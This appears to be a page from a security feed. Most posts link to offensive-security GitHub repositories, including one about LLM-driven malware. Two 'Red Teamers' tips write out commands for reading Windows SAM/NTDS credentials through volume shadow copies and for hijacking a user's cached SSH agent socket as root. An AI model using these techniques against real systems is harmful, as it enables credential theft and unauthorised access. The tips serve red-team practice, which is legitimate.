Recent posts
Page 58 of 85 · 1,013 posts
Posted Mar 8
https://github.com/ldpreload/Medusa/?s=09
Posted Mar 7
https://www.chatpdf.com/
Posted Mar 7
https://github.com/tess-ss/recon-ninja?s=09
Posted Mar 6
Posted Mar 5
https://github.com/SPTHvx/SPTH/blob/master/articles/files/LLMorpher.txt?s=09
Posted Mar 4
Posted Mar 4
Posted Mar 3
https://github.com/JusticeRage/Gepetto?s=09
Posted Mar 1
Red Teamers: Volume shadow copies are backups of parts (or all) of the Windows filesystem. Accessing can be easy privesc (SAM, NTDS, etc.) 1. List shadows vssadmin list shadows 2. Symlink for access mklink /d c:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
Posted Mar 1
Posted Feb 28
Red Teamers: SSH caches keys of ongoing sessions in /tmp; root user can hijack them and SSH to any machine the user can access. ps aux | grep ssh ls -lah /tmp SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l SH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh user@target
Posted Feb 25
https://github.com/ihebski/A-Red-Teamer-diaries?s=09